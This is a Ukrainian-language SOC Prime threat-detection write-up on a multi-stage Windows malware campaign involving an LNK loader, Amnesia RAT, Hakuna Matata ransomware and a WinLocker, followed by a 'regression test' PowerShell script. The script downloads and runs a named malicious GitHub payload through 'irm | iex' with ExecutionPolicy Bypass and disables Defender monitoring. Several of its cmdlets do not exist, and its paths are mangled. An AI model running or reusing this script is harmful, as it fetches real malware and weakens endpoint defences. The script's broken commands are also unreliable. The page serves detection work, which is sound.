SOC Prime Bias: Високий

04 Feb 2026 14:20 UTC

Всередині багатоступеневої операції з Windows-шкідливим програмним забезпеченням

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Стежити
Всередині багатоступеневої операції з Windows-шкідливим програмним забезпеченням
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

FortiGuard Labs виявили багатоступеневий ланцюг вторгнення в Windows, який починається з шкідливого файлу LNK, що доставляється в стиснутому архіві. Ярлик запускає початкову PowerShell завантажувач, який витягує наступні скрипти з GitHub, а потім передає управління обфускованому оркестратору VBScript. Процес намагається ослабити захист кінцевої точки, вимикаючи Microsoft Defender, розгортаючи утиліту Defendnot і інсценуючи як Amnesia RAT, так і програму-здирник Hakuna Matata. Операція завершується скиданням компонента WinLocker, який блокує робочий стіл, щоб перешкодити відновленню та чинити тиск на жертв.

Розслідування

Слідчі відновили шлях виконання із PowerShell етапу, запущеного з LNK, до VBScript, який відновлює корисні навантаження в пам’яті, призводячи до розгортання програмного забезпечення-здирника і поведінки блокування робочого столу. Захисні заходи були обійдені через цільові редагування реєстру та ін’єкцією Defendnot DLL в Taskmgr.exe. Постійність була реалізована за допомогою комбінації записів Run key і артефактів папки Автозавантаження для повторного запуску ланцюга після входу.

Пом’якшення

Моніторте підозрілі зміни реєстру на рівні політики в розділах HKLMSOFTWAREPoliciesMicrosoftWindows Defender та HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies. Заблокуйте вихід до відомих шкідливих URL GitHub та Dropbox, що використовуються для інсценування, та попереджуйте про шаблони завантаження та виконання PowerShell, що походять з запусків LNK. Забезпечте білий список додатків і посиліть контроль виконання PowerShell для зменшення початкового доступу на основі скриптів.

Реакція

Якщо виявлено, ізолюйте кінцеву точку, відновіть налаштування реєстру, що стосуються Defender, до відомого доброго стану, і видаліть шкідливі файли і записи постійності. Проводьте пошук активних процесів Amnesia RAT і пов’язаної мережевої активності, і валідуйте, чи відбулося виконання програмного забезпечення-здирника. Проведіть повну судово-медичну експертизу, щоб оцінити вплив і усунути залишки, потім відновіть системи з чистих резервних копій, де це можливо.

Потік атаки

Виконання симуляції

Передумови: Перевірка телеметрії та базова попередня перевірка має бути пройдена.

Обґрунтування: Цей розділ детально описує точне виконання техніки противника (TTP), призначеної для виклику правила виявлення. Команди та наратив повинні безпосередньо відображати визначені TTPs та націлені на генерацію тієї самої телеметрії, яку очікує логіка виявлення. Абстрактні або не пов’язані приклади призведуть до неправильної діагностики.

  • Атака & Команди:
    Противник, який отримав початкове закріплення на кінцевій точці, бажає завантажити та виконати шкідливий PowerShell корисний навантажувач, уникаючи політики виконання за замовчуванням. Вони використовують Invoke‑Expression (iex) у поєднанні з Invoke‑WebRequest (irm) для витягування скрипту з віддаленого GitHub raw URL, запускаючи його під -ExecutionPolicy Bypass. Після встановлення постійності вони відключають моніторинг реального часу Windows Defender, щоб уникнути виявлення наступних корисних навантажень. Ці кроки безпосередньо генерують командні рядки, за якими спостерігає правило Sigma.

  • Сценарій регресійного тестування:

    # --------------------------------------------------------------
    # Крок 1 – Виконати віддалений скрипт з ExecutionPolicy Bypass
    # --------------------------------------------------------------
    $maliciousUrl = "https://github.com/Mafin111/MafinREP111/raw/refs/heads/main/ps1/kira.ps1"
    powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "irm '$maliciousUrl' | iex"
    
    # --------------------------------------------------------------
    # Крок 2 – Вимкнути моніторинг реального часу Windows Defender
    # --------------------------------------------------------------
    # Вимкнути захист у реальному часі
    Disable-MpPreference -DisableRealtimeMonitoring $true
    # Додати шлях для виключення (симульовано)
    Add-MpPreference -ExclusionPath "C:TempExcludeFolder"
  • Команди очищення:

    # Повторно увімкнути моніторинг реального часу Windows Defender
    Enable-MpPreference -DisableRealtimeMonitoring $false
    
    # Видалити шлях для виключення (якщо існує)
    Remove-MpPreference -ExclusionPath "C:TempExcludeFolder" -ErrorAction SilentlyContinue
    
    # Зупинити будь-які залишкові PowerShell процеси, запущені скриптом
    Get-Process -Name powershell | Where-Object {$_.StartInfo.Arguments -match 'kira.ps1'} | Stop-Process -Force